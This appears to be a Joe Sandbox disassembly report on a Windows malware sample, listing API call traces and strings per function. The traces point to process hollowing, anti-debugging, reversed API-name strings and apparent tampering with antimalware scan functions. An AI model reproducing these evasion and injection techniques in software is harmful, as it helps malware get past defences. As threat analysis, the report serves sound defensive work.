Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: Library$MemoryThreadVirtual$AddressContextFreeLoadProc$AllocateCreateHandleModuleProcessReadResumeSectionUnmapUserViewWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$H!(!$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 4083799063-748296347
Opcode ID: 372611b17cce9ce01b418db178e73af9aa4ef586ed121095a63c6a78e5fc4886
Instruction ID: 381a7239cc910b0f209d7fb66cca82562f14feb54a4ab9f229ee42b43612f713
Opcode Fuzzy Hash: 372611b17cce9ce01b418db178e73af9aa4ef586ed121095a63c6a78e5fc4886
Instruction Fuzzy Hash: 10E22D75A501299FDF25FBA4CCA4BDE73BAAF85304F1141A1E109EB214DE30AE86DF50

Function 02CA8BA6 Relevance: 47.1, APIs: 3, Strings: 23, Instructions: 1605
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CA881C: LoadLibraryA.KERNEL32(00000000,00000000,02CA8903), ref: 02CA8850
Part of subcall function 02CA881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02CA8903), ref: 02CA8860
Part of subcall function 02CA881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02CA8879
Part of subcall function 02CA881C: FreeLibrary.KERNEL32(74AE0000,00000000,02CF1388,Function_000065D8,00000004,02CF1398,02CF1388,000186A3,00000040,02CF139C,74AE0000,00000000,00000000,00000000,00000000,02CA8903), ref: 02CA88E3

Part of subcall function 02CA85D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CA8660

GetThreadContext.KERNEL32(00000864,02CF1420,ScanString,02CF13A4,02CAA774,UacInitialize,02CF13A4,02CAA774,ScanBuffer,02CF13A4,02CAA774,ScanBuffer,02CF13A4,02CAA774,UacInitialize,02CF13A4), ref: 02CA943A

Part of subcall function 02CA824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CA82BD

Part of subcall function 02CA84BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02CA8521

Part of subcall function 02CA79AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CA7A1F

Strings

UacScan, xrefs: 02CA8CAB, 02CA8EC3, 02CA94BF, 02CA98BB, 02CA9A2F, 02CAA1D9, 02CAA671
ScanBuffer, xrefs: 02CA8D04, 02CA8D8C, 02CA9127, 02CA923C, 02CA92D9, 02CA9612, 02CA9799, 02CA992C, 02CA9B11, 02CA9C26, 02CA9DE4, 02CA9F54, 02CAA0C7, 02CAA2BB, 02CAA4D9, 02CAA61F
H!(!, xrefs: 02CA8C8E, 02CA8C94, 02CA8D5C, 02CA9CD8
sppc, xrefs: 02CA91AE
MiniDumpWriteDump, xrefs: 02CAA54C
dbgcore, xrefs: 02CAA551, 02CAA565
NtSetSecurityObject, xrefs: 02CAA6C7
BCryptVerifySignature, xrefs: 02CAA3AB
I_QueryTagInformation, xrefs: 02CAA538
Initialize, xrefs: 02CA8F22, 02CA9530, 02CA96B7, 02CA9AA0, 02CA9D02, 02CA9E72, 02CA9FE5, 02CAA24A, 02CAA57B
NtOpenProcess, xrefs: 02CAA6DB
BCryptRegisterProvider, xrefs: 02CAA3D3
NtOpenObjectAuditAlarm, xrefs: 02CAA46C, 02CAA524
SLGetLicenseInformation, xrefs: 02CA9197
ScanString, xrefs: 02CA8C3A, 02CA8DE5, 02CA8F93, 02CA93BB, 02CA95A1, 02CA9728, 02CA9BB5, 02CA9D73, 02CA9EE3, 02CAA056, 02CAA341, 02CAA3EE
NtReadVirtualMemory, xrefs: 02CAA458
BCryptQueryProviderRegistration, xrefs: 02CAA3BF
advapi32, xrefs: 02CAA53D
UacInitialize, xrefs: 02CA8E6A, 02CA91CB, 02CA934A, 02CA944E, 02CAA168
MiniDumpReadDumpStream, xrefs: 02CAA560
ntdll, xrefs: 02CAA45D, 02CAA471, 02CAA529, 02CAA6CC, 02CAA6E0
OpenSession, xrefs: 02CA8BE1, 02CA9004, 02CA90B6, 02CAA487, 02CAA5CD
bcrypt, xrefs: 02CAA3B0, 02CAA3C4, 02CAA3D8

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: LibraryMemoryVirtual$AddressAllocateContextCreateFreeHandleLoadModuleProcProcessReadSectionThreadUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$H!(!$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 2852987580-748296347
Opcode ID: 3746bfad332be44db96b3f6475485303b6fda23c2e0175102fb081cf7a5a12d5
Instruction ID: a925ff61bfa986e514913fbd2b75636c37995eb4dab041bc4461b3767db3d6e1
Opcode Fuzzy Hash: 3746bfad332be44db96b3f6475485303b6fda23c2e0175102fb081cf7a5a12d5
Instruction Fuzzy Hash: C3E22D75A5012A9FDF25FBA4CCA4BDE73BAAF85304F1141A1E109EB214DE30AE46DF50

Function 02C95A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C90000,02CBD790), ref: 02C95A94
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C90000,02CBD790), ref: 02C95AB2
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C90000,02CBD790), ref: 02C95AD0
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02C95AEE
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02C95B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02C95B37
RegQueryValueExA.ADVAPI32(?,02C95CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02C95B7D,?,80000001), ref: 02C95B55
RegCloseKey.ADVAPI32(?,02C95B84,00000000,?,?,00000000,02C95B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C95B77
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02C95B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C95BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02C95BA7
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02C95BD2
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C95C19
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C95C29
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C95C51
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C95C61
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02C95C87
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02C95C97

Strings

Software\Borland\Delphi\Locales, xrefs: 02C95AE4
Software\Borland\Locales, xrefs: 02C95AA8, 02C95AC6

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: a7c33591854348a51efe585def1ae97e3d9152c8d1e9f8c47af4607c5d5aa3cc
Instruction ID: 19ab1774ad443053b05db0c1978f932841c68f21ce82809fcbe62fce7bd2208d
Opcode Fuzzy Hash: a7c33591854348a51efe585def1ae97e3d9152c8d1e9f8c47af4607c5d5aa3cc
Instruction Fuzzy Hash: F651B971A4064D7EFF26D6A4CC4AFEF77BD9B08784F8401A1A604E6180D7B49B44CFA4

Function 02CA8798 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(bcrypt,?,00000864,00000000,02CF13A4,02CAA3BF,ScanString,02CF13A4,02CAA774,ScanBuffer,02CF13A4,02CAA774,Initialize,02CF13A4,02CAA774,UacScan), ref: 02CA87AC
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CA87C6
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000864,00000000,02CF13A4,02CAA3BF,ScanString,02CF13A4,02CAA774,ScanBuffer,02CF13A4,02CAA774,Initialize), ref: 02CA8802

Part of subcall function 02CA7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CA7D6C

Strings

BCryptVerifySignature, xrefs: 02CA87BF
bcrypt, xrefs: 02CA87AB

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: a3dfa9e31aad4e94c41fda657156ed5236e97001aebb6606bb21b576117125f8
Instruction ID: e2aa633c89bc95334b91b1ae2a269b772971aa89815258bf8a8da1f7dcdeae59
Opcode Fuzzy Hash: a3dfa9e31aad4e94c41fda657156ed5236e97001aebb6606bb21b576117125f8
Instruction Fuzzy Hash: 71F0C271A80314DFEF90AB69A848F76379EA790399F480B3AB30C87580C7F18818CB50

Function 02CAEBE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 02CAEBF8
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02CAEC0A
CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02CAEC21

Strings

KernelBase, xrefs: 02CAEBF3
CheckRemoteDebuggerPresent, xrefs: 02CAEC04

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: AddressCheckDebuggerHandleModulePresentProcRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 35162468-539270669
Opcode ID: 8b597f9e60e357e2c8b29842ba4fd6c9d535d86d77ee17d26a47146286c27111
Instruction ID: c5873c43df87180156dcd6db0c5f9fdfd2910fd8a801148bbefc7610edc6959d
Opcode Fuzzy Hash: 8b597f9e60e357e2c8b29842ba4fd6c9d535d86d77ee17d26a47146286c27111
Instruction Fuzzy Hash: 96F0A03090464DBEEB12B6A888987ECFBAD9B0532CF6407A4A424B21C1E7711780C6A1

Function 02CADBA8 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02C94ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02C94EDA

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02CADC78), ref: 02CADBE3
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02CADC78), ref: 02CADC13
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02CADC28
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02CADC54
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02CADC5D

Part of subcall function 02C94C0C: SysFreeString.OLEAUT32(02CAE948), ref: 02C94C1A

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: ca65a266333266a6ca71d98db22aa7bf49d39164cdd0a53061cab38c91da1adb
Instruction ID: f752d58c2d53d1655d121a270eabb970fa9628f85b6bf8c331eba5812e4818f8
Opcode Fuzzy Hash: ca65a266333266a6ca71d98db22aa7bf49d39164cdd0a53061cab38c91da1adb
Instruction Fuzzy Hash: 1B210371A40309BBEB15EAE4CC56FDEB7BDAB08B04F500561B601F71C0D6B4AA059B95

Function 02CAE2F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CAE42E

Strings

OpenSession, xrefs: 02CAE3D0
Initialize, xrefs: 02CAE31E
ScanBuffer, xrefs: 02CAE377

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 2cd1c73fde7fd90dff57a62f10b5e8e1d9031b09debe91318eb23bea6f220d8f
Instruction ID: 4b9ff49dfd0d4e288524bdb15423916dc34bb4f6d4f5f53a114dcf187ce90c7f
Opcode Fuzzy Hash: 2cd1c73fde7fd90dff57a62f10b5e8e1d9031b09debe91318eb23bea6f220d8f
Instruction Fuzzy Hash: 90411A71A501099FEF24EBE4C8A5ADEB7FEEF48718F214436E041A7240DA74AD02DF54

Function 02CADAC4 Relevance: 6.1, APIs: 4, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02C94ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02C94EDA

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02CADB96), ref: 02CADB03
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02CADB3D
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02CADB6A
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02CADB73

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: 581e507639df3122f51a2e20743c1de5d5ff013deb6fd233d5ad362b7730710d
Instruction ID: 011fbfce847c115bf955564780d639c0199cdb881d1d27bec37894ac21fb2c63
Opcode Fuzzy Hash: 581e507639df3122f51a2e20743c1de5d5ff013deb6fd233d5ad362b7730710d
Instruction Fuzzy Hash: 47211A71A40309BAEB24EAE4DC56F9EB7BDAB04B04F604161B601F75C0D7B0AE05DAA5

Function 02CA85D4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON

Download Yara Rule

APIs

Part of subcall function 02CA8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA8088,?,?,00000000,?,02CA79FE,ntdll,00000000,00000000,02CA7A43,?,?,00000000), ref: 02CA8056
Part of subcall function 02CA8018: GetModuleHandleA.KERNELBASE(?), ref: 02CA806A

Part of subcall function 02CA80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA8148,?,?,00000000,00000000,?,02CA8061,00000000,KernelBASE,00000000,00000000,02CA8088), ref: 02CA810D
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA8113
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(?,?), ref: 02CA8125

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CA8660

Strings

CreateProcessAsUserW, xrefs: 02CA85ED
Kernel32, xrefs: 02CA861F

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: HandleModule$AddressProc$CreateProcessUser
String ID: CreateProcessAsUserW$Kernel32
API String ID: 3130163322-2353454454
Opcode ID: 38ea65a7b3d50ea9089eeb63c998bf63ba09bc2667743a8592ab27fd0bee3b59
Instruction ID: 19eb3a7cc4ab6469d4f13f1cb6b346524a78a2d84fb33d7306f1fa1e3aacd2b7
Opcode Fuzzy Hash: 38ea65a7b3d50ea9089eeb63c998bf63ba09bc2667743a8592ab27fd0bee3b59
Instruction Fuzzy Hash: 301100B2640209AFEB90EFACCC61F9A77EDEB0C704F524620BA08D3600C674E9109B60

Function 02CA79AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02CA8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA8088,?,?,00000000,?,02CA79FE,ntdll,00000000,00000000,02CA7A43,?,?,00000000), ref: 02CA8056
Part of subcall function 02CA8018: GetModuleHandleA.KERNELBASE(?), ref: 02CA806A

Part of subcall function 02CA80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA8148,?,?,00000000,00000000,?,02CA8061,00000000,KernelBASE,00000000,00000000,02CA8088), ref: 02CA810D
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA8113
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(?,?), ref: 02CA8125

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CA7A1F

Strings

yromeMlautriVetacollAwZ, xrefs: 02CA79C7
ntdll, xrefs: 02CA79F4

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: 15ec6cadc689d5b48b2348f0bc595b0307622d0d267c35a3ce7a850ca49dd8e4
Instruction ID: 60ce0eb4b2f318508f9e0b144b075c1a87fe26e5dad574a1c4427de71ef1a00b
Opcode Fuzzy Hash: 15ec6cadc689d5b48b2348f0bc595b0307622d0d267c35a3ce7a850ca49dd8e4
Instruction Fuzzy Hash: 63116975640209BFEB10EFA4DC61FAEB7AEFB48714F414421B909D7600DA70AE19DB60

Function 02CA79AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02CA8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA8088,?,?,00000000,?,02CA79FE,ntdll,00000000,00000000,02CA7A43,?,?,00000000), ref: 02CA8056
Part of subcall function 02CA8018: GetModuleHandleA.KERNELBASE(?), ref: 02CA806A

Part of subcall function 02CA80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA8148,?,?,00000000,00000000,?,02CA8061,00000000,KernelBASE,00000000,00000000,02CA8088), ref: 02CA810D
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA8113
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(?,?), ref: 02CA8125

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CA7A1F

Strings

yromeMlautriVetacollAwZ, xrefs: 02CA79C7
ntdll, xrefs: 02CA79F4

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: 215ddd634da6d9490bb5596ccf705bbc7b6112d71c64d4fefe84f636641c4c52
Instruction ID: 49407db81536667f12c00bcb90e0055dd59831cc63ff57b18a1cf26f8e383fa7
Opcode Fuzzy Hash: 215ddd634da6d9490bb5596ccf705bbc7b6112d71c64d4fefe84f636641c4c52
Instruction Fuzzy Hash: FA118C75640209BFEB10EFA4DC61F9EB7AEFB48714F414421B909D7600DA70AE19DB60

Function 02CA824C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02CA8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA8088,?,?,00000000,?,02CA79FE,ntdll,00000000,00000000,02CA7A43,?,?,00000000), ref: 02CA8056
Part of subcall function 02CA8018: GetModuleHandleA.KERNELBASE(?), ref: 02CA806A

Part of subcall function 02CA80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA8148,?,?,00000000,00000000,?,02CA8061,00000000,KernelBASE,00000000,00000000,02CA8088), ref: 02CA810D
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA8113
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(?,?), ref: 02CA8125

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CA82BD

Strings

ntdll, xrefs: 02CA8294
yromeMlautriVdaeRtN, xrefs: 02CA8267

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
